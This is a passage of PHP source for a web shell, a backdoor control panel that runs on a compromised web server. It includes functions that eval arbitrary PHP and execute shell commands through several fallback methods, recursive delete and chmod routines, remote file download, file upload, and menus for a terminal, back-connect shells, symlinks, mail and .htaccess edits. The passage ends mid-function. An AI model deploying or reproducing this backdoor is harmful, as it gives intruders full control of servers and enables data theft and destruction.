stIsIE=!1;if(sorttable={init:function(){arguments.callee.done||(arguments.callee.done=!0,_timer&&clearInterval(_timer),document.createElement&&document.getElementsByTagName&&(sorttable.DATE_RE=/^(\d\d?)[\/\.-](\d\d?)[\/\.-]((\d\d)?\d\d)$/,forEach(document.getElementsByTagName("table"),function(t){-1!=t.className.search(/\bsortable\b/)&&sorttable.makeSortable(t)})))},makeSortable:function(t){if(0==t.getElementsByTagName("thead").length&&(the=document.createElement("thead"),the.appendChild(t.rows[0]),t.insertBefore(the,t.firstChild)),null==t.tHead&&(t.tHead=t.getElementsByTagName("thead")[0]),1==t.tHead.rows.length){sortbottomrows=[];for(e=0;e<t.rows.length;e++)-1!=t.rows[e].className.search(/\bsortbottom\b/)&&(sortbottomrows[sortbottomrows.length]=t.rows[e]);if(sortbottomrows){null==t.tFoot&&(tfo=document.createElement("tfoot"),t.appendChild(tfo));for(e=0;e<sortbottomrows.length;e++)tfo.appendChild(sortbottomrows[e]);delete sortbottomrows}headrow=t.tHead.rows[0].cells;for(var e=0;e<headrow.length;e++)headrow[e].className.match(/\bsorttable_nosort\b/)||(mtch=headrow[e].className.match(/\bsorttable_([a-z0-9]+)\b/),mtch&&(override=mtch[1]),mtch&&"function"==typeof sorttable["sort_"+override]?headrow[e].sorttable_sortfunction=sorttable["sort_"+override]:headrow[e].sorttable_sortfunction=sorttable.guessType(t,e),headrow[e].sorttable_columnindex=e,headrow[e].sorttable_tbody=t.tBodies[0],dean_addEvent(headrow[e],"click",sorttable.innerSortFunction=function(t){if(-1!=this.className.search(/\bsorttable_sorted\b/))return sorttable.reverse(this.sorttable_tbody),this.className=this.className.replace("sorttable_sorted","sorttable_sorted_reverse"),this.removeChild(document.getElementById("sorttable_sortfwdind")),sortrevind=document.createElement("span"),sortrevind.id="sorttable_sortrevind",sortrevind.innerHTML=stIsIE?' <font face="webdings">5</font>':" ▴",void this.appendChild(sortrevind);if(-1!=this.className.search(/\bsorttable_sorted_reverse\b/))return sorttable.reverse(this.sorttable_tbody),this.className=this.className.replace("sorttable_sorted_reverse","sorttable_sorted"),this.removeChild(document.getElementById("sorttable_sortrevind")),sortfwdind=document.createElement("span"),sortfwdind.id="sorttable_sortfwdind",sortfwdind.innerHTML=stIsIE?' <font face="webdings">6</font>':" ▾",void this.appendChild(sortfwdind);theadrow=this.parentNode,forEach(theadrow.childNodes,function(t){1==t.nodeType&&(t.className=t.className.replace("sorttable_sorted_reverse",""),t.className=t.className.replace("sorttable_sorted",""))}),sortfwdind=document.getElementById("sorttable_sortfwdind"),sortfwdind&&sortfwdind.parentNode.removeChild(sortfwdind),sortrevind=document.getElementById("sorttable_sortrevind"),sortrevind&&sortrevind.parentNode.removeChild(sortrevind),this.className+=" sorttable_sorted",sortfwdind=document.createElement("span"),sortfwdind.id="sorttable_sortfwdind",sortfwdind.innerHTML=stIsIE?' <font face="webdings">6</font>':" ▾",this.appendChild(sortfwdind),row_array=[],col=this.sorttable_columnindex,rows=this.sorttable_tbody.rows;for(e=0;e<rows.length;e++)row_array[row_array.length]=[sorttable.getInnerText(rows[e].cells[col]),rows[e]];row_array.sort(this.sorttable_sortfunction),tb=this.sorttable_tbody;for(var e=0;e<row_array.length;e++)tb.appendChild(row_array[e][1]);delete row_array}))}},guessType:function(t,e){sortfn=sorttable.sort_alpha;for(var r=0;r<t.tBodies[0].rows.length;r++)if(text=sorttable.getInnerText(t.tBodies[0].rows[r].cells[e]),""!=text){if(text.match(/^-?[£$¤]?[\d,.]+%?$/))return sorttable.sort_numeric;if(possdate=text.match(sorttable.DATE_RE),possdate){if(first=parseInt(possdate[1]),second=parseInt(possdate[2]),first>12)return sorttable.sort_ddmm;if(second>12)return sorttable.sort_mmdd;sortfn=sorttable.sort_ddmm}}return sortfn},getInnerText:function(t){if(!t)return"";if(hasInputs="function"==typeof t.getElementsByTagName&&t.getElementsByTagName("input").length,null!=t.getAttribute("sorttable_customkey"))return t.getAttribute("sorttable_customkey");if(void 0!==t.textContent&&!hasInputs)return t.textContent.replace(/^\s+|\s+$/g,"");if(void 0!==t.innerText&&!hasInputs)return t.innerText.replace(/^\s+|\s+$/g,"");if(void 0!==t.text&&!hasInputs)return t.text.replace(/^\s+|\s+$/g,"");switch(t.nodeType){case 3:if("input"==t.nodeName.toLowerCase())return t.value.replace(/^\s+|\s+$/g,"");case 4:return t.nodeValue.replace(/^\s+|\s+$/g,"");case 1:case 11:for(var e="",r=0;r<t.childNodes.length;r++)e+=sorttable.getInnerText(t.childNodes[r]);return e.replace(/^\s+|\s+$/g,"");default:return""}},reverse:function(t){newrows=[];for(e=0;e<t.rows.length;e++)newrows[newrows.length]=t.rows[e];for(var e=newrows.length-1;e>=0;e--)t.appendChild(newrows[e]);delete newrows},sort_numeric:function(t,e){return aa=parseFloat(t[0].replace(/[^0-9.-]/g,"")),isNaN(aa)&&(aa=0),bb=parseFloat(e[0].replace(/[^0-9.-]/g,"")),isNaN(bb)&&(bb=0),aa-bb},sort_alpha:function(t,e){return t[0]==e[0]?0:t[0]<e[0]?-1:1},sort_ddmm:function(t,e){return mtch=t[0].match(sorttable.DATE_RE),y=mtch[3],m=mtch[2],d=mtch[1],1==m.length&&(m="0"+m),1==d.length&&(d="0"+d),dt1=y+m+d,mtch=e[0].match(sorttable.DATE_RE),y=mtch[3],m=mtch[2],d=mtch[1],1==m.length&&(m="0"+m),1==d.length&&(d="0"+d),dt2=y+m+d,dt1==dt2?0:dt1<dt2?-1:1},sort_mmdd:function(t,e){return mtch=t[0].match(sorttable.DATE_RE),y=mtch[3],d=mtch[2],m=mtch[1],1==m.length&&(m="0"+m),1==d.length&&(d="0"+d),dt1=y+m+d,mtch=e[0].match(sorttable.DATE_RE),y=mtch[3],d=mtch[2],m=mtch[1],1==m.length&&(m="0"+m),1==d.length&&(d="0"+d),dt2=y+m+d,dt1==dt2?0:dt1<dt2?-1:1},shaker_sort:function(t,e){for(var r=0,o=t.length-1,n=!0;n;){n=!1;for(s=r;s<o;++s)if(e(t[s],t[s+1])>0){a=t[s];t[s]=t[s+1],t[s+1]=a,n=!0}if(o--,!n)break;for(var s=o;s>r;--s)if(e(t[s],t[s-1])<0){var a=t[s];t[s]=t[s-1],t[s-1]=a,n=!0}r++}}},document.addEventListener&&document.addEventListener("DOMContentLoaded",sorttable.init,!1),/WebKit/i.test(navigator.userAgent))var _timer=setInterval(function(){/loaded|complete/.test(document.readyState)&&sorttable.init()},10);window.onload=sorttable.init,dean_addEvent.guid=1,fixEvent.preventDefault=function(){this.returnValue=!1},fixEvent.stopPropagation=function(){this.cancelBubble=!0},Array.forEach||(Array.forEach=function(t,e,r){for(var o=0;o<t.length;o++)e.call(r,t[o],o,t)}),Function.prototype.forEach=function(t,e,r){for(var o in t)void 0===this.prototype[o]&&e.call(r,t[o],o,t)},String.forEach=function(t,e,r){Array.forEach(t.split(""),function(o,n){e.call(r,o,n,t)})};var forEach=function(t,e,r){if(t){var o=Object;if(t instanceof Function)o=Function;else{if(t.forEach instanceof Function)return void t.forEach(e,r);"string"==typeof t?o=String:"number"==typeof t.length&&(o=Array)}o.forEach(t,e,r)}};
</script>
<script type="text/javascript">
var xhr;
window.onload=function(){
getFocus("terminal-input");
getFocus("find-action");
getFocus("sourcefocus");
getFocus("php-code");
};
function getFocus(id){
if(document.getElementById(id)!==null){
document.getElementById(id).focus();}
}
function getAjax(txt,id,method,url){
var xmlhttp;
var urlf="";
var data=new FormData();
var params=url.split("&");
for(i=0;i<params.length;i++){
val=params[i].split("=");
if(val[0]=='text-encode'){
data.append(val[0],val[1]);
}else{if(val[0].indexOf('?')<0)
{urlf+='&'+val[0]+'='+val[1];}}}
if(window.XMLHttpRequest){xmlhttp=new XMLHttpRequest();
}else{xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");}
xmlhttp.onreadystatechange=function(){
sts=["Request Not Initialized",
"Server Connection Established",
"Request Received",
"Processing Request",
"Request Finished"];
if(xmlhttp.readyState==4&&xmlhttp.status==200){
if(txt){document.getElementById(id).innerHTML=xmlhttp.responseText;
}else{document.getElementById(id).value=xmlhttp.responseText;}
}else{
if(txt){document.getElementById(id).innerHTML=
"[Status] "+"Please Wait... <div class='loading'></div><br>"+
"[State] "+sts[xmlhttp.readyState]+"<br>"+
"[Response] "+xmlhttp.response;
}else{document.getElementById(id).value=
"[Status] "+"Please Wait...\n"+
"[State] "+sts[xmlhttp.readyState]+"\n"+
"[Response] "+xmlhttp.response;}}
};
xmlhttp.open(method,window.location.href+urlf,true);
xmlhttp.send(data);
xhr=xmlhttp;
}
function ajaxAbort(txt,id){
if(txt){document.getElementById(id).innerHTML="Canceled";
}else{document.getElementById(id).value="Canceled";}
xhr.abort();
}
function checkAll(){
for(var i=0;i<document.getElementsByName('chk[]').length;i++){
document.getElementsByName('chk[]')[i].checked=document.getElementsByName('check-all')[0].checked;}
}
function checkCount(id){
count=1;
for(var i=0;i<document.getElementsByName('chk[]').length;i++){
if(document.getElementsByName('chk[]')[i].checked){
document.getElementById(id).innerHTML=count++;
}else{document.getElementById(id).innerHTML=count-1;}}
}
function mapSwitch(id,id2){
var a=document.getElementById(id);
var b=document.getElementById(id2);
if(a.style.display=='inline-block'){
a.style.display='none';
b.style.display='inline-block';
}else{a.style.display='inline-block';
b.style.display='none';}
}
function getParameter(p) {
var searchString=window.location.search.substring(1),
i,val,params=searchString.split("&");
for(i=0;i<params.length;i++){
val=params[i].split("=");
if(val[0]==p){
return val[1];}}
return null;
}
</script>
</head>
<body>
<div id="wrapper"><?php
$cur=any("c",$_SESSION)?urld($_SESSION['c']):getcwd();
$dir=any("d",$_REQUEST)?urld($_REQUEST['d']):$cur;
$map=any("r",$_REQUEST)?dirname(urld($_REQUEST['r'])):$dir;
function Unix()
{
return(strtolower(substr(PHP_OS,0,3))!="win");
}
function Evil($x,$y=false)
{
$c=$y==true?"?>".$x."<?php ":$x;
$evil=@eval($c);
if(error_get_last())
{
print "\n[Error] ";
return print_r(error_get_last());
}
return $evil;
}
function Execute($x)
{
$x=$x.' 2>&1';
if(!is_null($backtic=`$x`))
{
return $backtic;
}
elseif(function_exists('system'))
{
ob_start();
$system=system($x);
$buff=ob_get_contents();
ob_end_clean();
return $buff;
}
elseif(function_exists('exec'))
{
$buff="";
exec($x,$results);
foreach($results as $result)
{
$buff.=$result;
}
return $buff;
}
elseif(function_exists('shell_exec'))
{
$buff=shell_exec($x);
return $buff;
}
elseif(function_exists('pcntl_exec'))
{
$buff=pcntl_exec($x);
return $buff;
}
elseif(function_exists('passthru'))
{
ob_start();
$passthru=passthru($x);
$buff=ob_get_contents();
ob_end_clean();
return $buff;
}
elseif(function_exists('proc_open'))
{
$proc=proc_open($x,array(
array("pipe","r"),
array("pipe","w"),
array("pipe","w")
),$pipes);
$buff=stream_get_contents($pipes[1]);
return $buff;
}
elseif(function_exists('popen'))
{
$buff="";
$pop=popen($x,"r");
while(!feof($pop))
{
$buff.=fread($pop,1024);
}
pclose($pop);
return $buff;
}
return "R.I.P Command";
}
function Remove($x)
{
if(is_dir($x))
{
if($h=@opendir($x))
{
while(false!==($f=readdir($h)))
{
if($f!="."&&$f!="..")
{
Remove($x._.$f);
}
}
closedir($h);
}
return rmdir($x);
}
elseif(is_file($x))
{
return unlink($x);
}
return false;
}
function ChmodRecursive($x,$y)
{
if(is_dir($x))
{
if($h=@opendir($x))
{
while(false!==($f=readdir($h)))
{
if($f!="."&&$f!="..")
{
ChmodRecursive($x._.$f);
}
}
closedir($h);
}
return chmod($x,$y);
}
elseif(is_file($x))
{
return chmod($x,$y);
}
return false;
}
function CopyRecursive($x,$y)
{
if(is_dir($x))
{
@mkdir($y);
if($h=@opendir($x))
{
while(false!==($f=readdir($h)))
{
if($f!="."&&$f!="..")
{
CopyRecursive($x._.$f,$y._.$f);
}
}
closedir($h);
}
return true;
}
elseif(is_file($x))
{
return copy($x,$y);
}
return false;
}
function MoveRecursive($x,$y)
{
if(is_dir($x))
{
@mkdir($y);
if($h=@opendir($x))
{
while(false!==($f=readdir($h)))
{
if($f!="."&&$f!="..")
{
MoveRecursive($x._.$f,$y._.$f);
}
}
closedir($h);
}
return Remove($x);
}
elseif(is_file($x))
{
if(copy($x,$y))
{
return unlink($x);
}
}
return false;
}
function GetDownloadUrl($x,$y)
{
global $agent;
$fl=fopen($y,"w");
$ch=curl_init();
curl_setopt($ch,CURLOPT_USERAGENT,$agent);
curl_setopt($ch,CURLOPT_URL,$x);
curl_setopt($ch,CURLOPT_FILE,$fl);
curl_setopt($ch,CURLOPT_HEADER,0);
curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,0);
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);
curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
$rs=curl_exec($ch);
if(curl_error($ch)) return curl_error($ch);
curl_close($ch);
fclose($fl);
return true;
}
function GetUrlExists($x)
{
global $agent;
$ch=curl_init();
curl_setopt($ch,CURLOPT_USERAGENT,$agent);
curl_setopt($ch,CURLOPT_URL,$x);
curl_setopt($ch,CURLOPT_TIMEOUT,5);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,5);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
$rs=curl_exec($ch);
$http=curl_getinfo($ch,CURLINFO_HTTP_CODE);
if(curl_error($ch)) return curl_error($ch);
curl_close($ch);
return ($http>=200 && $http<300);
}
function GetUrlContent($x)
{
global $agent;
$ch=curl_init();
curl_setopt($ch,CURLOPT_USERAGENT,$agent);
curl_setopt($ch,CURLOPT_URL,$x);
curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,0);
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
$rs=curl_exec($ch);
if(curl_error($ch)) return curl_error($ch);
curl_close($ch);
return $rs;
}
function GetUrlFromPath($x)
{
$fix_path=str_replace(_,'/',$x);
$protocol=empty($_SERVER['HTTPS'])||$_SERVER['HTTPS']==='off'?'http://':'https://';
$path=str_replace(document_root,'',$fix_path);
return $protocol.server_name.$path;
}
function PostUrlContent($url,$content)
{
global $agent;
$params=array(
'http' => array(
'method' => "POST",
'header' => "Content-Type: application/x-www-form-urlencoded\r\n".
"User-Agent: $agent\r\n",
'content' => http_build_query($content)
)
);
$results="";
$context=stream_context_create($params);
$header=get_headers($url);
if($http=substr($header[0],9,3) != "200")
{
$results="Error: $http";
}
else
{
//file_get_contents
if($contents=file_get_contents($url,null,$context))
{
$results=htmlspecialchars($contents);
}
//stream_get_contents
if($handle=fopen($url,'r',false,$context))
{
$contents=stream_get_contents($handle);
fclose($handle);
$results=htmlspecialchars($contents);
}
//fopen
if($handle=fopen($url,'r',false,$context))
{
$contents="";
while(!feof($handle))
{
$contents.=fread($handle,10240);
}
fclose($handle);
$results=htmlspecialchars($contents);
}
}
return $results;
}
function GetFileType($x)
{
if(is_file($x))
{
return pathinfo($x)['extension'];
}
elseif(is_dir($x))
{
return "dir";
}
elseif(is_link($x))
{
return "link";
}
else
{
return "-";
}
}
function GetFileTime($x,$y)
{
switch($y)
{
case "create":return date("Y-m-d H:i:s",@filectime($x));break;
case "modify":return date("Y-m-d H:i:s",@filemtime($x));break;
case "access":return date("Y-m-d H:i:s",@fileatime($x));break;
}
}
function GetFilePerm($x)
{
$perms=@fileperms($x);
switch ($perms & 0xF000)
{case 0xC000:$info='s';break;case 0xA000:$info='l';break;
case 0x8000:$info='r';break;case 0x6000:$info='b';break;
case 0x4000:$info='d';break;case 0x2000:$info='c';break;
case 0x1000:$info='p';break;default:$info='u';}
$info .=(($perms & 0x0100)?'r':'-');$info .=(($perms & 0x0080)?'w':'-');
$info .=(($perms & 0x0040)?(($perms & 0x0800)?'s':'x' ):(($perms & 0x0800)?'S':'-'));
$info .=(($perms & 0x0020)?'r':'-');$info .=(($perms & 0x0010)?'w':'-');
$info .=(($perms & 0x0008)?(($perms & 0x0400)?'s':'x' ):(($perms & 0x0400)?'S':'-'));
$info .=(($perms & 0x0004)?'r':'-');$info .=(($perms & 0x0002)?'w':'-');
$info .=(($perms & 0x0001)?(($perms & 0x0200)?'t':'x' ):(($perms & 0x0200)?'T':'-'));
return sprintf('%s [%s]',$info,substr(decoct($perms),2));
}
function GetFileSize($x)
{
$x=abs($x);
$size=array('B','KB','MB','GB','TB','PB','EB','ZB','YB');
$exp=$x?floor(log($x)/log(1024)):0;
return sprintf('%.2f '.$size[$exp],($x/pow(1024,floor($exp))));
}
function GetUser($x)
{
if(function_exists('posix_getpwuid')&&function_exists('posix_getgrgid'))
{
$uid=posix_getpwuid(posix_getuid());
$gid=posix_getgrgid(posix_getgid());
switch($x)
{
case 'usr':return $uid['name'];break;
case 'uid':return $uid['uid'];break;
case 'grp':return $gid['name'];break;
case 'gid':return $gid['gid'];break;
}
}
else
{
switch($x)
{
case 'usr':return get_current_user();break;
case 'uid':return getmyuid();break;
case 'grp':return "?";break;
case 'gid':return getmygid();break;
}
}
}
function GetOwnerGroup($x)
{
if(Unix())
{
if(function_exists('posix_getpwuid')&&function_exists('posix_getgrgid'))
{
$user=posix_getpwuid(fileowner($x));
$group=posix_getgrgid(filegroup($x));
return sprintf('%s:%s',$user['name'],$group['name']);
}
}
return "?:?";
}
function GetFileOwnerGroup($x)
{
if(Unix())
{
if(function_exists('posix_getpwuid')&&function_exists('posix_getgrgid'))
{
$user=posix_getpwuid(fileowner($x));
$group=posix_getgrgid(filegroup($x));
return sprintf('%s:%s/%s:%s',$user['name'],$user['uid'],$group['name'],$group['gid']);
}
}
return "?:?/?:?";
}
function GetSafeMode()
{
if(strtolower(ini_get("safe_mode"))=='on')
{
$safemod="<font class='off'>ON</font>";
}
else
{
$safemod="<font class='on'>OFF</font>";
}
return $safemod;
}
function MapDirectory($x)
{
$map="";
$d=str_replace("\\",_,$x);
if(empty($d))
{
$d=realpath(".");
}
elseif(realpath($d))
{
$d=realpath($d);
}
$d=str_replace("\\",_,$d);
if(substr($d,-1)!=_)
{
$d.=_;
}
$d=str_replace("\\\\","\\",$d);
$pd=$e=explode(_,substr($d,0,-1));
$i=0;
foreach($pd as $b)
{
$t="";
$j=0;
foreach($e as $r)
{
$t.=$r._;
if($j==$i)
{
break;
}
$j++;
}
$map.="<a href=\"?d=".urle($t)."\" >".htmlspecialchars($b)."</a>"._;
$i++;
}
return rtrim($map,_);
}
function MapDrive($x)
{
if(!Unix())
{
$v=explode("\\",$x);
$v=$v[0];
$l="";
foreach(range("A","Z") as $lt)
{
$drive=is_dir($lt.":\\");
if($drive)
{
$l.="<a href=\"?d=".urle($lt.":\\")."\">[";
if(strtolower($lt.':')!=strtolower($v))
{
$l.=$lt;
}
else
{
$l.="<font color=\"orange\"><b>".$lt."</b></font>";
}
$l.="]</a>";
}
}
return $l;
}
}
function MainMenu()
{
$menu=array(
"ExpL" => "?d=".urle(getcwd()),
"★ Sec." => "?x=secure",
"Info" => "?x=info",
"Database" => "?x=db",
"Terminal" => "?x=terminal",
"Connect" => "?x=connect",
".Htaccess" => "?x=htaccess",
"PHP" => "?x=php",
"Perl/CGI" => "?x=perl",
"Mail" => "?x=mail",
"Process" => "?x=process",
"Shells" => "?x=shells",
"Symlink" => "?x=symlink",
"♛ Tools" => "?z",
"Account" => "?x=account",
"Update" => "?x=update",
"Logout" => "?x=logout"
);
$nu="";
foreach($menu as $key => $val)
{
$idxkey=substr($val,1,1);
$idxval=substr($val,3);
$active=any($idxkey,$_REQUEST)&&$_REQUEST[$idxkey]==$idxval?"class='active'":"";
if($key=="Logout")
{
$nu.="<li><a ".$active." href='".$val."' onclick=\"return confirm('Bye !');\">".$key."</a></li>";
}
else
{
$nu.="<li><a ".$active." href='".$val."'>".$key."</a></li>";
}
}
return $nu;
}
function MenuTools($x)
{
global $menu_tools;
$ol="<div class='menu-tools'><ul>";
$menu_tools=$x;
foreach($menu_tools as $k => $v)
{
$active=$_REQUEST['z']==$k?"class='active'":"";
$ol.="<li><a ".$active." href='?z=".$k."'>[".$v['title']."]</a></li>";
}
$ol.="</ul></div>";
return $ol;
}
printf("<div id='header'>
<div class='header-left'>
<div id='info'>
<font class='on'>[%s]</font><br>
<font class='on'>[%s]</font><br>
[<a href='//%s' target='_blank'>%s</a>]: <font class='on'>%s:%s</font> [%s]: <font class='on'>%s:%s</font><br>
[USER]: <font class='on'>%s(%s)</font> [GROUP]: <font class='on'>%s(%s)</font><br>
[HDD]: <font class='on'>%s</font> / <font class='on'>%s</font><br>
[PHPMODE]: <font class='on'>%s</font><br>
[SAFEMODE]: <font class='on'>%s</font><br>
</div>
</div>
<div class='header-right'>
<a href='%s'><div id='logo'>
<h1 id='title'>%s</h1>
<div class='line'></div>
<h2 id='subtitle'>%s</h2>
</div></a>
</div>
<div class='clr'></div>
</div>
<div id='container'>
<div class='menu'>
<ul>%s</ul>
</div>
<div class='menu-directory'>
<div class='map-switch'>
<input type='submit' name='map-switch' value='♞' onclick='mapSwitch(\"map1\",\"map2\")'>
</div>
<div class='map1' id='map1' style='display:inline-block'>
<span style='margin-right:5px'>%s</span>
<span style='margin-right:5px'>%s</span>
</div>
<div class='map2' id='map2' style='display:none'>
<form method='post' id='map2-form' onsubmit='document.getElementById(\"map2-form\").action=\"?g=\" + encodeURI(document.getElementById(\"map2-input\").value);'>
<input type='text' value='%s' id='map2-input'/>
<input type='submit' value='Go'>
</form>
</div>
</div>
<div class='content'>",
php_uname(),server_software,
server_name,server_name,gethostbyname(http_host),server_port,
B64D($account[0]),remote_addr,remote_port,
GetUser("usr"),GetUser("uid"),GetUser("grp"),GetUser("gid"),
GetFileSize(@disk_free_space($dir)),GetFileSize(@disk_total_space($dir)),
php_sapi_name(),GetSafeMode(),php_self,$config['title'],$config['subtitle'],
MainMenu(),MapDrive($map),MapDirectory($map),$map
);
if(any("g",$_REQUEST))
{
$g=$_REQUEST['g'];
if (is_dir($g))
{
header('location:'.php_self.'?d='.urle($g));
}
elseif(is_file($g)||is_link($g))
{
header('location:'.php_self.'?a=v&r='.urle($g));
}
else
{
header('location:'.php_self);
}
}
if(any("d",$_REQUEST)||request_uri===script_name)
{
$_SESSION['c']=urle($dir);
if(any("file",$_REQUEST)&&$_REQUEST['file']=="New File")
{
$file=trim($dir._.$_REQUEST['what']);
if(file_exists($file))
{
printf("<center style='margin-bottom:10px'><b class='off'>Can't create New File!</b></center>");
}
else
{
$mf=@fopen($file,"w");
fclose($mf);
header("location:".php_self."?a=e&r=".urle($file));
}
}
if(any("directory",$_REQUEST)&&$_REQUEST['directory']=="New Dir")
{
$dire=trim($_REQUEST['what']);
@chdir($dir);
if(!@mkdir($dire))
{
printf("<center style='margin-bottom:10px'><b class='off'>Can't create New Directory!</b></center>");
}
else
{
printf("<center style='margin-bottom:10px'><b class='on'>Directory '%s' Created on %s</b></center>",$dire,GetFileTime($dir._.$dire,'create'));
}
}
if(any("upload",$_REQUEST)&&$_REQUEST['upload']=="Upload")
{
$upload=$dir._.trim(basename($_FILES["what"]["name"]));
if(move_uploaded_file($_FILES["what"]["tmp_name"],$upload))
{
printf("<center style='margin-bottom:10px'><b class='on'>File %s has been uploaded</b></center>",basename($_FILES["what"]["name"]));
}
else
{
printf("<center style='margin-bottom:10px'><b class='off'>✕ Can't upload new file! ✕</b></center>");
}
}
if($handle=@opendir($dir))
{
$reads=array();
$count_dirs=0;
$count_files=0;
while(false!==($file=readdir($handle)))
{
$filedir=rtrim($dir,_)._.$file;
$updir=substr($dir,0,strrpos($dir,_));
if (strlen($updir)<=2) $updir=$updir._;
$type=GetFileType($filedir);
$size=GetFileSize(@filesize($filedir));
$last=GetFileTime($filedir,"modify");
$perm=GetFilePerm($filedir);
$owner=GetOwnerGroup($filedir);
$mime=@mime_content_type($filedir);
$view="";
if(strpos($mime,'image')!==false)
{
$view="?a=v&w=i&r=".urle($filedir);
}
elseif(strpos($mime,'video')!==false)
{
$view="?a=v&w=v&r=".urle($filedir);
}
elseif(strpos($mime,'audio')!==false)
{
$view="?a=v&w=a&r=".urle($filedir);
}
else
{
$view="?a=v&r=".urle($filedir);
}
if($file==".")
{
$reads[]="<tr sorttable_customkey='2'><td><center><input type='checkbox' name='nochk[]' value='".urle($dir)."'/></center></td><td><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAd5JREFUeNqMU79rFUEQ/vbuodFEEkzAImBpkUabFP4ldpaJhZXYm/RiZWsv/hkWFglBUyTIgyAIIfgIRjHv3r39MePM7N3LcbxAFvZ2b2bn22/mm3XMjF+HL3YW7q28YSIw8mBKoBihhhgCsoORot9d3/ywg3YowMXwNde/PzGnk2vn6PitrT+/PGeNaecg4+qNY3D43vy16A5wDDd4Aqg/ngmrjl/GoN0U5V1QquHQG3q+TPDVhVwyBffcmQGJmSVfyZk7R3SngI4JKfwDJ2+05zIg8gbiereTZRHhJ5KCMOwDFLjhoBTn2g0ghagfKeIYJDPFyibJVBtTREwq60SpYvh5++PpwatHsxSm9QRLSQpEVSd7/TYJUb49TX7gztpjjEffnoVw66+Ytovs14Yp7HaKmUXeX9rKUoMoLNW3srqI5fWn8JejrVkK0QcrkFLOgS39yoKUQe292WJ1guUHG8K2o8K00oO1BTvXoW4yasclUTgZYJY9aFNfAThX5CZRmczAV52oAPoupHhWRIUUAOoyUIlYVaAa/VbLbyiZUiyFbjQFNwiZQSGl4IDy9sO5Wrty0QLKhdZPxmgGcDo8ejn+c/6eiK9poz15Kw7Dr/vN/z6W7q++091/AQYA5mZ8GYJ9K0AAAAAASUVORK5CYII='/> <a title='Current Directory' href='?d=".urle($dir)."'>.</a></td><td><center>".strtoupper($type)."</center></td><td><center>".$size."</center></td><td><center>".$perm."</center></td><td><center>".$owner."</center></td><td><center>".$last."</center></td><td><a class='action' href='?a=x&r=".urle($dir)."' onclick=\"return confirm('Delete Directory [ /".basename($dir)." ] ?');\" title='Delete Folder'>✘</a> <a class='action' href='?a=c&r=".urle($dir)."' title='Modify Folder'>ℳ</a></td></tr>";
}
elseif($file=="..")
{
$reads[]="<tr sorttable_customkey='1'><td><center><input type='checkbox' name='nochk[]' value='".urle($updir)."'/></center></td><td><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAmlJREFUeNpsU0toU0EUPfPysx/tTxuDH9SCWhUDooIbd7oRUUTMouqi2iIoCO6lceHWhegy4EJFinWjrlQUpVm0IIoFpVDEIthm0dpikpf3ZuZ6Z94nrXhhMjM3c8895977BBHB2PznK8WPtDgyWH5q77cPH8PpdXuhpQT4ifR9u5sfJb1bmw6VivahATDrxcRZ2njfoaMv+2j7mLDn93MPiNRMvGbL18L9IpF8h9/TN+EYkMffSiOXJ5+hkD+PdqcLpICWHOHc2CC+LEyA/K+cKQMnlQHJX8wqYG3MAJy88Wa4OLDvEqAEOpJd0LxHIMdHBziowSwVlF8D6QaicK01krw/JynwcKoEwZczewroTvZirlKJs5CqQ5CG8pb57FnJUA0LYCXMX5fibd+p8LWDDemcPZbzQyjvH+Ki1TlIciElA7ghwLKV4kRZstt2sANWRjYTAGzuP2hXZFpJ/GsxgGJ0ox1aoFWsDXyyxqCs26+ydmagFN/rRjymJ1898bzGzmQE0HCZpmk5A0RFIv8Pn0WYPsiu6t/Rsj6PauVTwffTSzGAGZhUG2F06hEc9ibS7OPMNp6ErYFlKavo7MkhmTqCxZ/jwzGA9Hx82H2BZSw1NTN9Gx8ycHkajU/7M+jInsDC7DiaEmo1bNl1AMr9ASFgqVu9MCTIzoGUimXVAnnaN0PdBBDCCYbEtMk6wkpQwIG0sn0PQIUF4GsTwLSIFKNqF6DVrQq+IWVrQDxAYQC/1SsYOI4pOxKZrfifiUSbDUisif7XlpGIPufXd/uvdvZm760M0no1FZcnrzUdjw7au3vu/BVgAFLXeuTxhTXVAAAAAElFTkSuQmCC'/> <a title='Parent Directory' href='?d=".urle($updir)."'>".$file."</a></td><td><center>".strtoupper($type)."</center></td><td><center>".$size."</center></td><td><center>".$perm."</center></td><td><center>".$owner."</center></td><td><center>".$last."</center></td><td><a class='action' href='?a=x&r=".urle($updir)."' onclick=\"return confirm('Delete Directory [ /".basename($updir)." ] ?');\" title='Delete Folder'>✘</a> <a class='action' href='?a=c&r=".urle($updir)."' title='Modify Folder'>ℳ</a></td></tr>";
}
else
{
if($type=="dir")
{
